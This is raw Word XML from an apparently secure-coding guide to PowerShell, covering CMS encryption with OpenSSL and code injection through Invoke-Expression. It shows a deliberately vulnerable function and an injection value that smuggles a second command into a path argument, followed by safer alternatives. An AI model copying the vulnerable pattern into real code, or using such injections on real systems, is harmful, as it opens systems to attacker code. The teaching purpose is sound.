    <w:p w:rsidR="00C22667" w:rsidRDefault="00C22667"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First, protect some content with OpenSSL</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FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$encrypted</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Get-Process</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A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"C:\Program Files\OpenSSL\bin\openssl.exe"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cms</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-encrypt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-recip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.\cert.pem</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Change the OpenSSL mail header to the standard CMS header</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8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"-----BEGIN CMS-----"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$encrypted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-notmatch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>":"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"-----END CMS-----"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>encrypted.cms</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p>
    <w:p w:rsidR="00B938E9" w:rsidRDefault="00B938E9" w:rsidP="00B938E9">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Finally, decrypt with PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B938E9" w:rsidRDefault="00B938E9" w:rsidP="00B938E9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Unprotect-CmsMessage</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8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">.\encrypted.cms </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE09AC" w:rsidRDefault="00BE09AC" w:rsidP="00BE09AC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007677A9" w:rsidRDefault="007677A9" w:rsidP="00BE09AC"/>
    <w:p w:rsidR="005D400F" w:rsidRDefault="005D400F" w:rsidP="006174D0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Secure code generation APIs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003411E3" w:rsidRDefault="003411E3" w:rsidP="001B7BE1">
      <w:r>
        <w:t>Whenever you write code that may be subjected to attacker</w:t>
      </w:r>
      <w:r w:rsidR="00AE622F">
        <w:t>-controlled</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> input, code injection </w:t>
      </w:r>
      <w:r w:rsidR="00564AA1">
        <w:t xml:space="preserve">vulnerabilities </w:t>
      </w:r>
      <w:r>
        <w:t>are among the most dangerous type of bug</w:t>
      </w:r>
      <w:r w:rsidR="00564AA1">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006C5112">
        <w:t xml:space="preserve"> A good example of code that may be subjected to attacker-controlled input are functions that you expose in a constrained PowerShell runspace.</w:t>
      </w:r>
      <w:r w:rsidR="002F105C">
        <w:t xml:space="preserve"> If an attacker can exploit a code injection vulnerability in one of those functions, they can execute code as though it were part of the function itself. </w:t>
      </w:r>
      <w:r w:rsidR="009807FB">
        <w:t>That</w:t>
      </w:r>
      <w:r w:rsidR="002F105C">
        <w:t xml:space="preserve"> code would not be subject to the restrictions that you’ve applied to the constrained runspace.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F3624" w:rsidRDefault="000F3624" w:rsidP="001B7BE1">
      <w:r>
        <w:t xml:space="preserve">Almost every language can be subject to code injection vulnerabilities if used incorrectly. </w:t>
      </w:r>
      <w:r w:rsidR="00B110E4">
        <w:t>In SQL, this is called “SQL Injection”. In web sites, this is called “Cross site scripting”.</w:t>
      </w:r>
      <w:r w:rsidR="00673E2D">
        <w:t xml:space="preserve"> In CGI</w:t>
      </w:r>
      <w:r w:rsidR="009C2BCE">
        <w:t xml:space="preserve"> applications, </w:t>
      </w:r>
      <w:r w:rsidR="00673E2D">
        <w:t>shell scripts</w:t>
      </w:r>
      <w:r w:rsidR="009C2BCE">
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidR="00673E2D">
        <w:t>tools that invoke system commands</w:t>
      </w:r>
      <w:r w:rsidR="009C2BCE">
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00673E2D">
        <w:t>this is called “Command injection”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE4BB3" w:rsidRDefault="00324B11" w:rsidP="00D072E7">
      <w:r>
        <w:t xml:space="preserve">In PowerShell, the most common source of code injection vulnerabilities </w:t>
      </w:r>
      <w:r w:rsidR="00D10017">
        <w:t xml:space="preserve">comes from </w:t>
      </w:r>
      <w:r>
        <w:t>including attacker-controlled input</w:t>
      </w:r>
      <w:r w:rsidR="00AF7D71">
        <w:t xml:space="preserve"> in a string that you submit to the </w:t>
      </w:r>
      <w:r w:rsidR="00AF7D71">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Invoke-Expression</w:t>
      </w:r>
      <w:r w:rsidR="003177C9">
        <w:t xml:space="preserve"> c</w:t>
      </w:r>
      <w:r w:rsidR="00AF7D71">
        <w:t>ommand.</w:t>
      </w:r>
      <w:r w:rsidR="00D072E7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DE4BB3">
        <w:t>For example:</w:t>
      </w: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Get-MyAcl</w:t>
      </w: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w:t>
      </w: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param</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$Path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w: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Invoke-Expression</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">"Get-Acl </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$Path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D70EA" w:rsidRDefault="007D70EA" w:rsidP="007D70EA">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p>
    <w:p w:rsidR="001613A1" w:rsidRPr="001613A1" w:rsidRDefault="007D70EA" w:rsidP="001613A1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001613A1">
        <w:t xml:space="preserve">If </w:t>
      </w:r>
      <w:r w:rsidR="001613A1">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$Path</w:t>
      </w:r>
      <w:r w:rsidR="001613A1">
        <w:t xml:space="preserve"> contains input such as “</w:t>
      </w:r>
      <w:r w:rsidR="001613A1" w:rsidRPr="001613A1">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="001613A1" w:rsidRPr="001613A1">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Write-Host Pwnd</w:t>
      </w:r>
      <w:r w:rsidR="001613A1">
        <w:t xml:space="preserve">”, the attacker can now execute the </w:t>
      </w:r>
      <w:r w:rsidR="001613A1" w:rsidRPr="001613A1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Write-Host</w:t>
      </w:r>
      <w:r w:rsidR="001613A1">
        <w:t xml:space="preserve"> cmdlet (or much worse!) as well.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0021542C" w:rsidRDefault="00D072E7" w:rsidP="001613A1">
      <w:r>
        <w:t xml:space="preserve">The Invoke-Expression cmdlet should almost always be avoided, as PowerShell (like other languages) has many features that </w:t>
      </w:r>
      <w:r w:rsidR="006F7F78">
        <w:t>take its place more securely.</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Invoke a static command</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FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Get-Acl</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8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>c:\temp\file.txt</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Supply a dynamic parameter value</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with a variable reference</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$paramValue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"c:\temp\file.txt"</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FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Get-Acl</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FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$paramValue</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Supply both a dynamic parameter name and</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value through 'splatting'</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$parameters</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 Path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"c:\temp\file.txt"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</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FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Get-Acl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>@parameters</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Supply a dynamic command name, parameter name,</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and parameter value through the invocation</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6400"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>## operator and splatting</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$commandName</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"Get-Acl"</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$parameters</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 Path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"c:\temp\file.txt"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00644335" w:rsidRDefault="00644335" w:rsidP="00644335">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$commandName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">@parameters </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D400F" w:rsidRDefault="00621186" w:rsidP="001B7BE1">
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00585E45">
        <w:t xml:space="preserve">If you are ever truly required to generate PowerShell scripts after making all attempts to avoid it, </w:t>
      </w:r>
      <w:r w:rsidR="00936FAA">
        <w:t>PowerShell version 5</w:t>
      </w:r>
      <w:r w:rsidR="004C7E72">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="00936FAA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004C7E72" w:rsidRPr="00A339D2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>KB 3000850</w:t>
      </w:r>
      <w:r w:rsidR="004C7E72" w:rsidRPr="00430F50">
        <w:rPr>
          <w:lang w:bidi="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00133742">
        <w:t>introduces</w:t>
      </w:r>
      <w:r w:rsidR="00B02DA3">
        <w:t xml:space="preserve"> APIs to support secure generation of scripts that may contain attacker input.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00681C50" w:rsidRPr="00681C50" w:rsidRDefault="00681C50" w:rsidP="00681C50">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00681C50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>13 [C:\temp]</w:t>
      </w:r>
      <w:r w:rsidRPr="00681C50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
        <w:t>&gt;&gt; [</w:t>
      </w:r>
      <w:r w:rsidRPr="00681C50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>System.Management.Automation.Language.CodeGeneration</w:t>
      </w:r>
      <w:r w:rsidRPr="00681C50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve">] | </w:t>
      </w:r>
      <w:r w:rsidRPr="00681C50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="FFFF00"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>gm</w:t>
      </w:r>
      <w:r w:rsidRPr="00681C50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00681C50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t>–static</w:t>
      </w:r>
      <w:r w:rsidRPr="00681C50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00681C50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00681C50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:t xml:space="preserve">   TypeName: System.Management.Automation.Language.CodeGeneration</w:t>
      </w:r>
      <w:r w:rsidRPr="00681C50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00681C50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
        <w:t>Name                            MemberType Definition</w:t>
      </w:r>
      <w:r w:rsidRPr="00681C50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00681C50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>----                            ---------- ----------</w:t>
      </w:r>
      <w:r w:rsidRPr="00681C50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="012456"/>
        </w:rPr>
        <w:br/>
        <w:t>Equals                          Method     static bool Equals(System.Object objA, System.Object objB)</w:t>
      </w:r>
      <w:r w:rsidRPr="00681C50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="EEEDF0"/>
          <w:sz w:val="16"/>
